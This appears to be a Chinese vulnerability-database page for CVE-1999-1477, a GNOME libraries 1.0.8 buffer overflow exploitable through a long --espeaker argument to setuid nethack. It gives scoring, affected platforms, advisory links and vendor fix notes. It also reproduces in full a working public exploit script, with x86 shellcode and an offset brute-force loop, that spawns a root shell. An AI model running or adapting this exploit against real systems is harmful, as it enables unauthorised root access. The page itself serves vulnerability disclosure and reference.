CVE-1999-1477
CVSS7.2
发布时间 :1999-09-23 00:00:00
修订时间 :2008-09-05 16:19:37
NMCOES    

[原文]Buffer overflow in GNOME libraries 1.0.8 allows local user to gain root access via a long --espeaker argument in programs such as nethack.


[CNNVD]GNOME espeaker本地缓冲区溢出漏洞(CNNVD-199909-043)

        GNOME libraries 1.0.8中存在缓冲区溢出漏洞。本地用户通过如 nethack程序中的长--espeaker参数获得根访问权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:gnome:gnome_libs:1.0.8
cpe:/o:mandrakesoft:mandrake_linux:6.0MandrakeSoft Mandrake Linux 6.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1477
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1477
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199909-043
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/static/3349.php
(VENDOR_ADVISORY)  XF  gnome-espeaker-local-bo(3349)
http://www.securityfocus.com/bid/663
(VENDOR_ADVISORY)  BID  663
http://www.securityfocus.com/archive/1/28717
(VENDOR_ADVISORY)  BUGTRAQ  19990923 Linux GNOME exploit

- 漏洞信息

GNOME espeaker本地缓冲区溢出漏洞
高危 缓冲区溢出
1999-09-23 00:00:00 2005-10-20 00:00:00
本地  
        GNOME libraries 1.0.8中存在缓冲区溢出漏洞。本地用户通过如 nethack程序中的长--espeaker参数获得根访问权限。

- 公告与补丁

        MandrakeSoft has made available a fix for the 'nethack' program. This does not fix the GNOME vulnerability but its stops it from being exploited via the 'nethack' executable. You can find the updated gnomehack RPM at
        http://www.linux-mandrake.com/en/fupdates.php

- 漏洞信息 (19512)

Mandriva Linux Mandrake 6.0,Gnome Libs 1.0.8 espeaker Local Buffer Overflow (EDBID:19512)
linux local
1999-09-26 Verified
0 Brock Tellier
N/A [点击下载]
source: http://www.securityfocus.com/bid/663/info

A buffer overflow vulnerabilityin GNOME's shared libraries handling of the 'espeaker' command line argument may allow local users to attack setuid binaries linked against these libraries to obtain root access.

Calling a program linked against GNOME with the command like arguments '--enable-sound --espeaker=<80 byte buffer>' results in a buffer overflow.

One known setuid root program linked against these libraries in the Mandrake 6.0 distribution is '/usr/games/nethack'.

It is likely this is a vulnerability in the libesd shared library instead of libgnome. In that case esound 0.2.8 would be vulnerable. 

#!/bin/bash
# Generic exploit for GNOME apps under Linux x86
# Our overflowed buffer is just 80 bytes so we'll have to get our settings
# just so.  Hence the shell script.
#
# This should work against any su/gid GNOME program.  The only one that comes
# with RH6.0 that is su/gid root is (the irony is killing me) nethack.
#
# Change the /usr/games/nethack statement in the while loop below to exploit
# a different program.
#
# -Brock Tellier btellier@webley.com

echo "Building /tmp/gnox.c..."
cat > /tmp/gnox.c <<EOF
/*
 * Generic GNOME overflow exploit for Linux x86, tested on RH6.0
 * Will work against any program using the GNOME libraries in the form
 * Keep your BUFSIZ at 90 and only modify your offset
 *
 */


#include <stdlib.h>
#include <stdio.h>

char gnoshell[]= /* Generic Linux x86 shellcode modified to run our
program */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/gn";

#define LEN 120
#define BUFLEN 90 /* no need to change this */
#define NOP 0x90
#define DEFAULT_OFFSET 300

unsigned long get_sp(void) {

__asm__("movl %esp, %eax");

}

void main(int argc, char *argv[]) {

int offset, i;
int buflen = BUFLEN;
long int addr;
char buf[BUFLEN];
char gnobuf[LEN];
if(argc > 2) {
  fprintf(stderr, "Error: Usage: %s <offset>\n", argv[0]);
  exit(0);
}
 else if (argc == 2){
   offset=atoi(argv[1]);
 }
 else {
   offset=DEFAULT_OFFSET;
 }


addr=get_sp();

fprintf(stderr, "Generic GNOME exploit for Linux x86\n");
fprintf(stderr, "Brock Tellier btellier@webley.com\n\n");
fprintf(stderr, "Using addr: 0x%x  buflen:%d  offset:%d\n", addr-offset,
buflen, offset);

memset(buf,NOP,buflen);
memcpy(buf+35,gnoshell,strlen(gnoshell));
for(i=35+strlen(gnoshell);i<buflen-4;i+=4)
        *(int *)&buf[i]=addr-offset;

sprintf(gnobuf, "--enable-sound --espeaker=%s", buf);
for(i=0;i<strlen(gnobuf);i++)
        putchar(gnobuf[i]);

}
EOF

echo "...done!"

echo "Building /tmp/gn.c..."

cat > /tmp/gn.c <<EOF
#include <unistd.h>

void main() {
  printf("before: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(),
geteuid(), getgid(), getegid());

  setreuid(geteuid(), geteuid());
  setregid(getegid(), getegid());

  printf("after: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(),
geteuid(), getgid(), getegid());

  system("/bin/bash");
}
EOF

echo "...done!"

echo "Compiling /tmp/gnox..."
gcc -o /tmp/gnox /tmp/gnox.c
echo "...done!"

echo "Compiling /tmp/gn..."
gcc -o /tmp/gn /tmp/gn.c
echo "...done!"

echo "Launching attack..."

offset=0

while [ $offset -lt 10000 ]; do
    /usr/games/nethack `/tmp/gnox $offset`
    offset=`expr $offset + 4`
done

echo "...done!"		

- 漏洞信息

13530
GNOME Libraries Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified, Uncoordinated Disclosure

- 漏洞描述

- 时间线

1999-09-26 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

GNOME espeaker Local Buffer Overflow Vulnerability
Boundary Condition Error 663
No No
1999-09-26 12:00:00 2009-07-11 12:56:00
This vulnerability was found by Brock Tellier <btellier@webley.com>.

- 受影响的程序版本

Mandriva Linux Mandrake 6.0
GNOME Gnome Libs 1.0.8
+ RedHat Linux 6.0
GNOME Gnome Libs 1.0.15

- 不受影响的程序版本

GNOME Gnome Libs 1.0.15

- 漏洞讨论

A buffer overflow vulnerabilityin GNOME's shared libraries handling of the 'espeaker' command line argument may allow local users to attack setuid binaries linked against these libraries to obtain root access.

Calling a program linked against GNOME with the command like arguments '--enable-sound --espeaker=&lt;80 byte buffer&gt;' results in a buffer overflow.

One known setuid root program linked against these libraries in the Mandrake 6.0 distribution is '/usr/games/nethack'.

It is likely this is a vulnerability in the libesd shared library instead of libgnome. In that case esound 0.2.8 would be vulnerable.

- 漏洞利用

x

- 解决方案

MandrakeSoft has made available a fix for the 'nethack' program. This does not fix the GNOME vulnerability but its stops it from being exploited via the 'nethack' executable. You can find the updated gnomehack RPM at http://www.linux-mandrake.com/en/fupdates.php

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站